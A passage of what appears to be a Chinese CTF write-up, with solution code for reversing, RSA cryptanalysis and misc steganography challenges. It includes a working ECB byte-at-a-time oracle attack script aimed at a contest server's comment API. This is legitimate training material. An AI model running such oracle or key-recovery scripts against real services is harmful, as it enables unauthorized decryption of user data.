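    if (str == NULL)
        return NULL;
    if (num >= 200)
        snprintf(str, cap, "num(%d)", (char)(num + 56));
    else if (num == 101)
        snprintf(str, cap, "reg1");
    else if (num == 102)
        snprintf(str, cap, "reg2");
    else
        snprintf(str, cap, "arr[%d]", num);
    return str;
}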
/*
 * Linear sweep of the opcode stream: print one mnemonic per instruction until
 * the 255 terminator. Opcodes 1..4 take two operands, 5..6 take one; any other
 * value is reported and the sweep advances by a single word.
 */
int main()
{
    static const char *const two_operand[] = {"mov", "xor", "add", "sub"};
    static const char *const one_operand[] = {"inc", "dec"};
    int pc = 0;
    while (opcode[pc] != 255)
    {
        unsigned int op = opcode[pc];
        if (op >= 1 && op <= 4)
        {
            int dst = opcode[pc + 1], src = opcode[pc + 2];
            printf("%s %s,%s\n", two_operand[op - 1], parseNum(dst), parseNum(src));
            pc += 3;
        }
        else if (op == 5 || op == 6)
        {
            int dst = opcode[pc + 1];
            printf("%s %s\n", one_operand[op - 5], parseNum(dst));
            pc += 2;
        }
        else
        {
            printf("ERROR!\n");
            pc += 1;
        }
    }
    return 0;
}

42

Ida打开发现最后的判断是个XXX+YYY+ZZZ==42的操作,所以这个42肯定有问题,况且程序不可能跑出解的,范围太大了
到网上搜,发现这个是个什么丢番图方程,目前有一个已知解
x=-80538738812075974,y=80435758145817515,z=12602123297335631;
继续回退,发现有个异或操作,dump出来数组异或,再回退发现是字符串转化为16进制,最后根据XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXX的格式读取flag内数据
所以写代码反过来操作即可

#include<cstdio>
#include<windows.h>
using namespace std;
// The known integer solution of x^3 + y^3 + z^3 = 42; main() prints the sum
// as a sanity check.
long long x=-80538738812075974,y=80435758145817515,z=12602123297335631; 
// x0/y0/z0 are not referenced anywhere in this listing.
long long x0=0xFEE1DEAF76BDF08F,y0=0x11DC37D846F5F42,z0=0x2CC5D914031D68;
// Bytes dumped from the binary and the XOR key; main() undoes the XOR and
// prints the hex string that (per the write-up) forms the flag's UUID body.
unsigned char strs[]="\xDE\xEC\xCF\x30\xB5\x98\xD3\xEA\x14\xE9\x49\x6E\x8E\xB4\x27";
unsigned char keys[]="3nder5tandf10@t";
//flag{ed82ab5-5c7a-da78-b7a8-d2f5fbef453}
// Bitwise XOR of two 64-bit values (kept from the listing; main() does not call it).
unsigned long long xors(unsigned long long t,unsigned long long q)
{
    unsigned long long out = t;
    out ^= q;
    return out;
}
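/*
 * Sanity-check the Diophantine solution, then undo the binary's XOR step.
 *
 * The cubes of x, y and z do not fit in 64 bits, so the sum is evaluated in
 * unsigned arithmetic, which is defined to wrap modulo 2^64; because the true
 * sum is 42, the wrapped value is 42 too and the printed line is unchanged.
 * (The original signed expression relied on overflow behaviour that C++
 * leaves undefined.) The loop then XORs the 15 dumped bytes with the key and
 * prints each as upper-case hex with no separator.
 */
int main()
{
    unsigned long long ux = (unsigned long long)x;
    unsigned long long uy = (unsigned long long)y;
    unsigned long long uz = (unsigned long long)z;
    unsigned long long sum = ux*ux*ux + uy*uy*uy + uz*uz*uz;
    printf("%lld\n", (long long)sum);
    // strs holds 15 data bytes plus the NUL; keys has exactly 15 characters.
    for(int i=0;i<15;i++)
    {
        strs[i]^=keys[i];
        printf("%X",strs[i]);
    }
    //printf("%s\n",strs);
    return 0;
}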

Analysis of virus:

真·病毒分析,打开后发现是AGCT,AGCU什么的,多半是DNA/RNA转录翻译之类的操作,最后还发现有个蛋白质链表,所以实锤
具体逻辑就是判断起始密码子和结束密码子,再将三个一组的密码子转化为氨基酸,再做比较,但是这里存在多解的可能,MD5的限定下似乎还是多解

from md5 import *

# Amino-acid sequence read out of the binary's "protein" table; dfs() below
# enumerates every codon string that translates to it (Met ... Stp).
index=['Met','Cys','Leu','Ala','Arg','Leu','Phe','Ser','Ile','Leu','Asn','Val','Cys','Gly','Lys','Leu','Stp']
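# Codon table as used by this write-up. NOTE(review): it appears incomplete
# relative to the standard genetic code (e.g. Leu's UUA/UUG and Arg's CGN
# codons are absent); kept as-is because the search must match the
# challenge's own table.
_CODONS = {
    'Met': ['AUG'],
    'Cys': ['UGU', 'UGC'],
    'Leu': ['CUU', 'CUC', 'CUA', 'CUG'],
    'Ala': ['GCU', 'GCC', 'GCA', 'GCG'],
    'Arg': ['AGA', 'AGG'],
    'Phe': ['UUU', 'UUC'],
    'Ser': ['UCU', 'UCC', 'UCA', 'UCG'],
    'Ile': ['AUU', 'AUC', 'AUA'],
    'Asn': ['AAU', 'AAC'],
    'Val': ['GUU', 'GUC', 'GUA', 'GUG'],
    'Gly': ['GGU', 'GGC', 'GGA', 'GGG'],
    'Lys': ['AAA', 'AAG'],
    'Stp': ['UAA', 'UAG', 'UGA'],
}


def getList(pro):
    """Return the RNA codons for amino acid ``pro``, or None if it is unknown.

    A fresh list is returned on every call (the original rebuilt the lists
    each time), so callers may mutate the result safely.
    """
    codons = _CODONS.get(pro)
    return None if codons is None else list(codons)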
def dfs(id,str):
    """Enumerate codon strings for index[id:] appended to ``str``.

    When the sequence is exhausted (id > 16) the candidate is printed if its
    MD5 hex digest starts with 'e03657'. Parameter names shadow the builtins
    ``id`` and ``str`` but are kept for compatibility with existing callers.
    """
    if id > 16:
        if md5(str).hexdigest()[0:6] == 'e03657':
            print(str)
        return
    for codon in getList(index[id]):
        dfs(id + 1, str + codon)
# Exhaustive search from the first amino acid; as the write-up notes, a
# six-hex-digit hash prefix can still admit more than one string.
dfs(0,"")

BabyMac

逻辑比较简单,将输入40bytes每四个一组与一个数组进行计算操作,得到了80bytes目标数组,再将目标数组与程序内部数据比较
所以可以试着爆搜,先将那个初始数组dump出来,就可以进行暴力求解了,考虑到flag格式ascii,时间可以优化一下

#include<cstdio>
#include<cstdlib>
using namespace std;
// Per-bit weights: bit k of the 32-bit input (k = 0 is the LSB) contributes
// arr[31 - k]. Only the first 32 of the 33 slots are initialised and used; the
// last one is value-initialised to 0.
unsigned long long arr[33]=
{
  1145141919810LL,   11451419198005LL,  88175927824097LL,  59547379826567LL,
  85885643980259LL,  111078766210607LL, 34354257570550LL,  4580567632918LL,
  4580567587375LL,   56111953885801LL,  73289082498024LL,  6870850780444LL,
  17177127320052LL,  73289079912751LL,  4580561769860LL,   75579354889270LL,
  65273065791251LL,  13741655762243LL,  54966717600097LL,  104207725601353LL,
  112223529937564LL, 40079210785300LL,  96190408447959LL,  27480380444247LL,
  106492147280229LL, 56099851547153LL,  44636329825478LL,  101869220767707LL,
  41128288922888LL,  67369732888265LL,  11064138437126LL,  26708844553169LL
};

// Expected output for each 4-byte group of the 40-byte input (10 groups; the
// 11th slot is unused).
unsigned long long flag[11]={
0x30970372813D2,0x2D3A89BCA52AC,0x31551E79154A2,0x2C522E9A5298A,
0x2A61367C5C698,0x264491C01CAFD,0x26CA3A06C98B3,0x2DACBD12FB903,
0x2E470707574E1,0x309E5DC39A9A7};

// Weighted popcount of the low 32 bits of num: the sum of arr[31 - k] over
// every set bit k. Higher bits of num are ignored.
unsigned long long check(unsigned long long num)
{
    unsigned long long total = 0;
    for (int k = 0; k < 32; ++k)
    {
        if ((num >> k) & 1ULL)
            total += arr[31 - k];
    }
    return total;
}
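/*
 * Brute-force 4-byte group c of the input.
 *
 * Every candidate byte is in [33, 136]; the four bytes are assembled as a
 * little-endian 32-bit value (a1 is the lowest byte), which is what the
 * original's in-memory cast produced on x86 — the explicit composition also
 * removes the per-candidate malloc that the original never freed (over 10^8
 * leaked 4-byte blocks per group). Each match is printed as four characters
 * with no newline; "ERROR" is printed if nothing matched. As in the
 * original, a match only ends the innermost loop, so several solutions for
 * the same group would all be printed.
 */
void trys(int c)
{
    bool okk = false;
    for (unsigned a1 = 33; a1 <= 136; a1++)
        for (unsigned a2 = 33; a2 <= 136; a2++)
            for (unsigned a3 = 33; a3 <= 136; a3++)
                for (unsigned a4 = 33; a4 <= 136; a4++)
                {
                    unsigned int ls = a1 | (a2 << 8) | (a3 << 16) | (a4 << 24);
                    if (check(ls) == flag[c])
                    {
                        printf("%c%c%c%c", a1, a2, a3, a4);
                        okk = true;
                        break;
                    }
                }
    if (!okk)
        printf("ERROR\n");
}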
// Recover the ten 4-byte groups in order; the output is the concatenated matches.
int main()
{
    int group = 0;
    while (group < 10)
    {
        trys(group);
        ++group;
    }
    return 0;
}

Crypto

easy_RSA

#!coding=utf8
from gmpy2 import invert
from Crypto.Util.number import long_to_bytes
from z3 import *

n = 7772032347449135823378220332275440993540311268448333999104955932478564127911903406653058819764738253486720397879672764388694000771405819957057863950453851364451924517697547937666368408217911472655460552229194417053614032700684618244535892388408163789233729235322427060659037127722296126914934811062890693445333579231298411670177246830067908917781430587062195304269374876255855264856219488896495236456732142288991759222315207358866038667591630902141900715954462530027896528684147458995266239039054895859149945968620353933341415087063996651037681752709224486183823035542105003329794626718013206267196812545606103321821
c = 2082303370386500999739407038433364384531268495285382462393864784029350314174833975697290115374382446746560936195242108283558410023998631974392437760920681553607338859157019178565294055755787756920003102506579335103169629546410439497570201554568266074421781047420687173530441469299976286281709526307661219925667082812294328343298836241624597491473793807687939912877432920934022304415340311930199467500833755390490763679081685821950332292303679223444816832000945972744492944044912168217765156110058474974887372388032286968936052010531850687361328326741707441938740295431353926037925950161386891437897990887861853097318

# p_q_1 is the value of p + q the challenge hands out (2**1024 - 1 - 65537);
# together with n = p*q that makes p and q the two roots of
# t**2 - p_q_1*t + n, which z3 is asked to solve directly below.
p_q_1=  2**1024 -1 - 65537
pq = n  # unused alias kept from the original


p = Int('p')
q = Int('q')

solve(p+q ==p_q_1,p*q == n)  # solve the two simultaneous equations
# with p and q known, a textbook RSA decryption of c finishes it

gmcn

首先lfsr已知明文攻击解开png,ECC加密中,根据定理得知A=p
待定系数获得B,解EC上的离散对数获得m的可行解,factor Q的阶得到周期。穷举即可得到flag

warm_up

# coding:utf-8

from Crypto.Util.number import *
from sympy.ntheory.residue_ntheory import sqrt_mod
import sympy.ntheory.residue_ntheory
import gmpy2

def factor_(nn, *args, **kwargs):
    """Factor ``nn`` using only the module-level primes ``p`` and ``q``.

    Drop-in replacement for sympy's ``factorint`` (extra arguments are
    ignored). Returns ``{p: t, q: s}`` when ``nn == p**t * q**s``; otherwise
    prints the unfactored remainder and returns None.
    """
    exponents = {}
    for prime in (p, q):
        count = 0
        while nn % prime == 0:
            nn //= prime
            count += 1
        exponents[prime] = count
    if nn != 1:
        print(nn)
        return None
    return exponents
# Monkey-patch sympy's factorint so that sqrt_mod(s_2, n1, True) below —
# which presumably factors its composite modulus through factorint — gets
# {p, q} immediately instead of attempting to factor the ~2048-bit n1.
sympy.ntheory.residue_ntheory.factorint = factor_

c1 = 9977992111543474765993146699435780943354123551515555639473990571150196059887059696672744669228084544909025528146255490100789992216506586730653100894938711107779449187833366325936098812758615334617812732956967746820046321447169099942918022803930068529359616171025439714650868454930763815035475473077689115645913895433110149735235210437428625515317444853803605457325117693750834579622201070329710209543724812590086065816764917135636424809464755834786301901125786342127636605411141721732886212695150911960225370999521213349980949049923324623683647865441245309856444824402766736069791224029707519660787841893575575974855
n1 = 15653165971272925436189715950306169488648677427569197436559321968692908786349053303839431043588260338317859397537409728729274630550454731306685369845739785958309492188309739135163206662322980634812713910231189563194520522299672424106135656125893413504868167774287157038801622413798125676071689173117885182987841510070517898710350608725809906704505037866925358298525340393278376093071591988997064894579887906638790394371193617375086245950012269822349986482584060745112453163774290976851732665573217485779016736517696391513031881133151033844438314444107440811148603369668944891577028184130587885396017194863581130429121
n2 = 16489315386189042325770722192051506427349661112741403036117573859132337429264884611622357211389605225298644036805277212706583007338311350354908188224017869204022357980160833603890106564921333757491827877881996534008550579568290954848163873756688735179943313218316121156169277347705100580489857710376956784845139492131491003087888548241338393764269176675849400130460962312511303071508724811323438930655022930044289801178261135747942804968069730574751117952892336466612936801767553879313788406195290612707141092629226262881229776085126595220954398177476898915921943956162959257866832266411559621885794764791161258015571
key_encode = 154190230043753146353030548481259824097315973300626635557077557377724792985967471051038771303021991128148382608945680808938022458604078361850131745923161785422897171143162106718751785423910619082539632583776061636384945874434750267946631953612827762111005810457361526448525422842867001928519321359911975591581818207635923763710541026422076426423704596685256919683190492684987278018502571910294876596243956361277398629634060304624160081587277143907713428490243383194813480543419579737033035126867092469545345710049931834620804229860730306833456574575819681754486527026055566414873480425894862255077897522535758341968447477137256183708467693039633376832871571997148048935811129126086180156680457571784113049835290351001647282189000382279868628184984112626304731043149626327230591704892805774286122197299007823500636066926273430033695532664238665904030038927362086521253828046061437563787421700166850374578569457126653311652359735584860062417872495590142553341805723610473288209629102401412355687033859617593346080141954959333922596227692493410939482451187988507415231993

e1=125794
e2=42373
'''
n1=p*q
n2=p*r
n3=p*q*s
c1=pow(s,e1,n1)
Key=int(KEY.encode('hex'),16)
key_encode=pow(Key,e2,n3)
'''

# n1 and n2 share the prime p, so a gcd recovers it and q follows.
p = gmpy2.gcd(n1,n2)
q = n1//p
# e1 is even and therefore not invertible mod phi(n1); inverting e1/2
# instead yields s**2 mod n1 rather than s.
d1_2 = gmpy2.invert(e1//2, (p-1) * (q-1))
s_2 = pow(c1, d1_2, n1)

n = p * q  # n and phi are not used below
phi = (p - 1) * (q - 1)
# Every square root of s_2 mod n1 is a candidate for s (sqrt_mod relies on the
# patched factorint above); each candidate gives an n3 and a trial decryption.
# (s-1) in the totient assumes the candidate s is prime.
s_list = [m for m in sqrt_mod(s_2, n1, True)]
for s in s_list:
    n3 = p*q*s
    d2 = gmpy2.invert(e2, (p-1)*(q-1)*(s-1))
    key = pow(key_encode, d2, n3)

    print(hex(key))
# Presumably the candidate that decoded cleanly, pasted back from the loop output.
key = 0x4ddea3dde9a7b8950545cb8cbc26ea8ba8c7fd989f2a0ca78c733a7849e359ba2b72a5a0bdbd71b9d954
enc = 17403902166198774030870481073653666694643312949888760770888896025597904503707411677223946079009696809

dec = enc ^ key
'''
dec=(dec^dec<<200 )&mask
'''
# Presumably undoes a self-XOR-with-shift step of the encoder; the masked
# variant above was tried first.
dec=(dec^dec<<200 )
print(long_to_bytes(dec))

simple_math

#!coding=utf8
import sympy
from gmpy2 import gcd,invert
from random import randint
from Crypto.Util.number import *
import random


flag=b"flag{XXX}"  # placeholder from the challenge source; not referenced in the visible script


def gen_prime(N):
    """Return an N-bit prime congruent to 3 mod 4, by rejection sampling over getPrime."""
    while True:
        candidate = getPrime(N)
        if candidate % 4 == 3:
            return candidate

def gen_N(A,B):
    """Return B! mod A: the product 2*3*...*B, reduced modulo A after every step."""
    acc = 1
    for factor in range(2, B + 1):
        acc = acc * factor % A
    return acc

def rev_gen_N(A,C):
    """Return C! mod A for prime A by walking back from Wilson's theorem.

    Starts from (A-1)! == A-1 (mod A) and divides out A-1, A-2, ..., C+1
    with modular inverses, i.e. the loop runs from C+1 up to A-1.
    """
    acc = A - 1
    for k in range(C + 1, A):
        acc = invert(k, A) * acc % A
    return acc

def gen_p():
    """Rebuild the challenge's prime p from its published constants.

    N2 is C! mod A computed backwards from Wilson's theorem (rev_gen_N); N1 is
    fixed to 1 here (the alternative A-1 is left commented). The seed
    2019*N1 + 2020*N2 is rounded up to the next prime.
    """
    A=17837832555368308689786098708027973117794970348203719986383141676940062201987761202777419099369816828481341695174601689881519219806887761505932440928699539
    B=(A-1)//2
    C=17837832555368308689786098708027973117794970348203719986383141676940062201987761202777419099369816828481341695174601689881519219806887761505932440928632158

    N1 = 1 # or A-1
    # N1 = A-1 # or A-1
    N2 = rev_gen_N(A,C)
    print(N1,N2)
    return sympy.nextprime(2019*N1+2020*N2)

def getpq(n,ed):
    """Split n into its two primes given e*d (a multiple of phi(n)).

    Standard randomised approach: pick a base g, strip factors of two from
    ed-1, and look for a non-trivial square root of 1 modulo n; its gcd with n
    is a factor. Retries with a new base until one is found. Returns (q, p).
    """
    def split_with(base):
        # Halve k while it stays even; the first y != 1 sharing a factor with n splits it.
        k = ed - 1  # some multiple of phi(n)
        while k % 2 == 0:
            k //= 2
            y = pow(base, k, n)
            if y != 1 and gcd(y - 1, n) > 1:
                return gcd(y - 1, n)
        return 1

    p = 1
    while p == 1:
        p = split_with(random.randint(0, n))
    return n // p, p

def gen_q():
    """Rebuild the second RSA prime from the published n and e*d.

    Factors n with getpq, forms seed2 = |2020*p - 2019*q| and returns the next
    prime after it.
    """
    n = 641840878174982655326850312496169636378455577115347500957057267640600977102280072913438154955029114771051709087809927454279064916870408880749853740239718248642560401110078626938726443568692572803490357236810832674229312155746539894173791356805341671586393273678865952155249500341932905426105470392415353610397045835698808163501258474762363712287163328526252399904787053101799058499120606154737990300449437479282435046167055009692493712202386368849122605419812883126887833074654434641607372149411668612504466768080306339558792828063148576123738980431264608446603326193849200810553196864085478463086993422774817059853949748247896512719994166090254440232652496451104455075071560127966288341488523110118075041150491577844082366096788215046025436488554795141938458493258409150407281215473354273599246314944034941237527510171900646139987019380766717951556307441871365874564881565374638513827494801194029940895912077179028101890662760455651864691251980479400416227456995236912364846811949410786643764713673564022863007331006828562341241738846980912184411395632790556038655767763976115640962139547171909279164623846000835333857705944581269631616760405747716520672142021728850694537269211784578408601266217928819863736428173736140161826738813
    ed = 534634151124279413732259524933495479098721499860333007593590357554306358799023578194908726136928354695079848972480649724456088941906723794709312712191247045425297126517594344899286925836796680956816064609089090503579894117057252969264121691849003333804607728687046319857910698511132867345476426833313854575436202087209472834349551593011689755514138197238955298350562839877955001729313715223006875793667570760703418551390980455326976431990257513342820095246552412287184147009729875110446230949824384166464485840066906862476445054049749692262294734099027915906839812656254886862402603631321290156949953461665657610306709058617222159635281067103921037090824796905267992798715820128476225045484793453227511548884919811033318570386881936137713666127231317606909893143214808788822341878386939352957962886113639632559883992777992209148001401767753558732492213499792179169681405789041595765504039612494711563472885565786566625643290565526077483663342991770220261962082523632475094223960703649343802215392245948547397211539801128773253646005228684994277460378625729491412757387260415740823541731482803143732545953736392746596116269262129834845033889284145602522548909021358829175225208236295389454408336909318816490014229410357900614079212880259236238467905

    # NOTE(review): getpq hands back the two factors in whichever order its
    # random base happens to expose them, and 2020*p - 2019*q is not symmetric
    # in p and q, so seed2 (and the prime returned) can differ between runs;
    # the absolute value only fixes the sign. If the decryption in __main__
    # yields garbage, re-run or swap p and q here.
    p, q = getpq(n, ed)
    seed2 = abs(2020 * p - 2019 * q)
    return sympy.nextprime(seed2)

if __name__ == "__main__":
    # Rebuild both primes (gen_p prints its intermediate N1/N2), then do a
    # textbook RSA decryption of the published ciphertext.
    _E = 65537
    _P = gen_p()
    _Q = gen_q()

    c = 183288709028723976658160448336519698700398459340947322152692016513169599029222514445118399653225032641541100129985101994918772329046946295962244096646038598600865786096896989355554955041779941259413115779915405468832327321189345505283184153652727885422718280179025251186380977491993641792341259672566237363655347151343020354489781675539571788934759950303331075098574759853670802171054084321131703969504258663714257549258635956184694450566287845760701724862418909255930636298209146539578608879672058346906370035692078859844402832322545368347681121504910035471822137023626638953992968941166744998545450662434365836169688461834868137046528403401190395486501502489519341656581057940794141420456022102711505759074332049547354944074402136763186087462931985682293826106916791831371302
    modulus = _P * _Q
    phin = (_P - 1) * (_Q - 1)
    d = invert(_E, phin)
    plaintext = pow(c, d, modulus)

    print(long_to_bytes(plaintext))

'''
output:
A:17837832555368308689786098708027973117794970348203719986383141676940062201987761202777419099369816828481341695174601689881519219806887761505932440928699539
C:17837832555368308689786098708027973117794970348203719986383141676940062201987761202777419099369816828481341695174601689881519219806887761505932440928632158
n:641840878174982655326850312496169636378455577115347500957057267640600977102280072913438154955029114771051709087809927454279064916870408880749853740239718248642560401110078626938726443568692572803490357236810832674229312155746539894173791356805341671586393273678865952155249500341932905426105470392415353610397045835698808163501258474762363712287163328526252399904787053101799058499120606154737990300449437479282435046167055009692493712202386368849122605419812883126887833074654434641607372149411668612504466768080306339558792828063148576123738980431264608446603326193849200810553196864085478463086993422774817059853949748247896512719994166090254440232652496451104455075071560127966288341488523110118075041150491577844082366096788215046025436488554795141938458493258409150407281215473354273599246314944034941237527510171900646139987019380766717951556307441871365874564881565374638513827494801194029940895912077179028101890662760455651864691251980479400416227456995236912364846811949410786643764713673564022863007331006828562341241738846980912184411395632790556038655767763976115640962139547171909279164623846000835333857705944581269631616760405747716520672142021728850694537269211784578408601266217928819863736428173736140161826738813
e*d:534634151124279413732259524933495479098721499860333007593590357554306358799023578194908726136928354695079848972480649724456088941906723794709312712191247045425297126517594344899286925836796680956816064609089090503579894117057252969264121691849003333804607728687046319857910698511132867345476426833313854575436202087209472834349551593011689755514138197238955298350562839877955001729313715223006875793667570760703418551390980455326976431990257513342820095246552412287184147009729875110446230949824384166464485840066906862476445054049749692262294734099027915906839812656254886862402603631321290156949953461665657610306709058617222159635281067103921037090824796905267992798715820128476225045484793453227511548884919811033318570386881936137713666127231317606909893143214808788822341878386939352957962886113639632559883992777992209148001401767753558732492213499792179169681405789041595765504039612494711563472885565786566625643290565526077483663342991770220261962082523632475094223960703649343802215392245948547397211539801128773253646005228684994277460378625729491412757387260415740823541731482803143732545953736392746596116269262129834845033889284145602522548909021358829175225208236295389454408336909318816490014229410357900614079212880259236238467905
ciphertext:183288709028723976658160448336519698700398459340947322152692016513169599029222514445118399653225032641541100129985101994918772329046946295962244096646038598600865786096896989355554955041779941259413115779915405468832327321189345505283184153652727885422718280179025251186380977491993641792341259672566237363655347151343020354489781675539571788934759950303331075098574759853670802171054084321131703969504258663714257549258635956184694450566287845760701724862418909255930636298209146539578608879672058346906370035692078859844402832322545368347681121504910035471822137023626638953992968941166744998545450662434365836169688461834868137046528403401190395486501502489519341656581057940794141420456022102711505759074332049547354944074402136763186087462931985682293826106916791831371302
'''

NewsWebsite

ECB 选择明文攻击(脚本按 8 字节分组逐字节爆破:比较密文第 0 块与第 7 块)

import requests
import json
import codecs
import base64


BS = 16  # block size assumed by pad(); the attack loop below does not use it


def pad(s):
    """PKCS#7-pad *s* up to a multiple of BS (unused below; kept from the original)."""
    pad_len = BS - len(s) % BS
    return s + chr(pad_len) * pad_len


url = "http://47.95.14.176:8233/"  # note the trailing slash; the POST below adds another
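def publish(username, email, content):
    """Post a comment on news item 27 and return it as the server stores it.

    The POST response carries the new comment's id; the comment is then
    re-fetched through the paginated listing (newest first, ten per page) so
    that ``commentContent`` -- the value the attack loop inspects -- is the
    server-side (encrypted) form rather than what was sent.

    Returns the matching comment dict, or None when the comment is not among
    the ten newest (the original also returned None in that case, implicitly).
    Note that ``url`` ends with "/" and the POST path starts with "/", so the
    POST goes to "//api/..." while the GET goes to "/api/..."; kept as-is.
    """
    created = json.loads(requests.post(url + '/api/comment/news/27', json={
        "commentEmail": email,
        "commentContent": content,
        "commentNickname": username,
    }).text)
    comment_id = created['commentId']

    listing = json.loads(requests.get(
        url + 'api/comment/news/27?size=10&page=0&sort=commentId%2Cdesc'
    ).text)
    # Use a str key: json.loads() produces str keys on Python 3 (unicode on
    # Python 2), so the original's b'commentId' lookup matched only on
    # Python 2 and silently returned None on Python 3.
    for comment in listing['content']:
        if comment['commentId'] == comment_id:
            return comment
    return None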
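a = []  # every ciphertext the server returned, kept for offline inspection

# Byte-at-a-time recovery under ECB with an 8-byte block: the loop compares
# ciphertext block 0 with block 7 (bytes 56..64). The guessed byte c is placed
# in front of the already-known tail `flag`, padded with chr(j) so block 0
# of the plaintext mirrors the block that holds the end of the secret plus
# its padding; the secret is thus recovered from its last byte backwards.
# NOTE(review): the assumed layout (our content followed by the secret,
# pad value == pad length) is inferred from the offsets compared below, not
# stated on the page -- confirm against the target if the loop stalls.
j = 7
flag = ""
charset = "gl{}-1234567890abcdef"
for i in range(50):
    print(i)
    for c in charset:
        print("=======char:{},j:{}".format(c, j))
        ret = publish('1', '1', c + flag + 24 * chr(j) + 'fffff')
        a.append(ret['commentContent'])
        data = base64.b64decode(ret['commentContent'])
        first_block = data[:8]
        target_block = data[64 - 8:64]
        print("{} {} {} {}".format(codecs.encode(first_block, 'hex'),
                                   codecs.encode(target_block, 'hex'),
                                   j, len(data)))
        if first_block == target_block:
            flag = c + flag
            print("flaggg : " + flag)
            # Pad length expected for the next round. The original did
            # `j -= 1`, then `if j == 0: j == 8` (a comparison, not an
            # assignment) and `j = j % 8`, so j reached 0 instead of 8 and
            # chr(0) filler was sent. Deriving j from the known length gives
            # the original's values (6, 5, ..., 1, then 7, 6, ...) everywhere
            # else and 8 where the original produced 0.
            j = 8 - (1 + len(flag)) % 8
            break
    else:
        # Requests are deterministic, so a round with no match would repeat
        # identically; stop instead of burning the remaining rounds.
        print("no candidate matched; stopping with flag: " + flag)
        break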

EasyRSA

from gmpy2 import mpz,powmod,invert
import sys
sys.path.append('/root/桌面/rsa')
from solve_equ import Solve
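def mypow2(bit):
    """Return 2**bit as a gmpy2 mpz.

    The original multiplied by 2 in a Python loop -- O(bit) big-int
    multiplications per call, inside a search that tries every bit width up
    to 4096. A single shift yields the same value. ``bit`` is expected to be
    non-negative, which is what the caller passes (100..4095).
    """
    return mpz(1) << bit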

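n = mpz(7772032347449135823378220332275440993540311268448333999104955932478564127911903406653058819764738253486720397879672764388694000771405819957057863950453851364451924517697547937666368408217911472655460552229194417053614032700684618244535892388408163789233729235322427060659037127722296126914934811062890693445333579231298411670177246830067908917781430587062195304269374876255855264856219488896495236456732142288991759222315207358866038667591630902141900715954462530027896528684147458995266239039054895859149945968620353933341415087063996651037681752709224486183823035542105003329794626718013206267196812545606103321821)
c = mpz(2082303370386500999739407038433364384531268495285382462393864784029350314174833975697290115374382446746560936195242108283558410023998631974392437760920681553607338859157019178565294055755787756920003102506579335103169629546410439497570201554568266074421781047420687173530441469299976286281709526307661219925667082812294328343298836241624597491473793807687939912877432920934022304415340311930199467500833755390490763679081685821950332292303679223444816832000945972744492944044912168217765156110058474974887372388032286968936052010531850687361328326741707441938740295431353926037925950161386891437897990887861853097318)

# The search below treats the primes as satisfying p + q == 2**bit - 65538 for
# an unknown bit width, so p and q are the roots of x**2 - (p + q)*x + n.
# Solve() is a project helper (solve_equ); from its use here it is assumed to
# return a list of roots when the quadratic has integer roots and 0 when it
# has none -- TODO confirm against solve_equ.
temp1 = None
for bit in range(100, 4096):
    temp = mypow2(bit) - mpz(65538)
    temp1 = Solve(1, -temp, n)
    if isinstance(temp1, list):
        print(temp1)
        break
    elif temp1 == 0:
        pass
    else:
        print(temp1)

# The original unpacked temp1 unconditionally and died with an opaque
# TypeError/ValueError when no bit width matched; fail with a clear message.
if not isinstance(temp1, list):
    raise SystemExit("no bit width in [100, 4096) gives integer roots for p + q")

p, q = temp1
e = mpz(65537)
d = invert(e, (p - 1) * (q - 1))
# The original computed d and stopped; powmod was imported for exactly this
# step, so finish the decryption and print the recovered integer.
print(powmod(c, d, n))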

Misc

funnygame

在资源文件里有扫雷.png,从中可以提取出压缩包,得到secret.txt
通过图片隐写得到OPENSSL加密密码,将其反转,得到flag.wav,听音得flag

签到

看视频

funnygame

binwalk图片得到密文,pyc隐写解密得到aeskey,

解密能够得到字节取反的文件,写脚本倒过来后,可以得到zip文件。

其中有音乐,用audacity打开,按时间取反,听到flag的读音。

Code_in Mouse

导出http流,得到index文件,其内容先用摩斯电码解码;解码结果最后几位有4个=(base64 填充最多 2 个 =,4 个 = 说明是 base32),用base32解密可以得到网址。进入后有一个图片,下载下来之后用winhex查看,里面有F5提示,用F5隐写工具解出flag.


文章来源: http://xz.aliyun.com/t/7281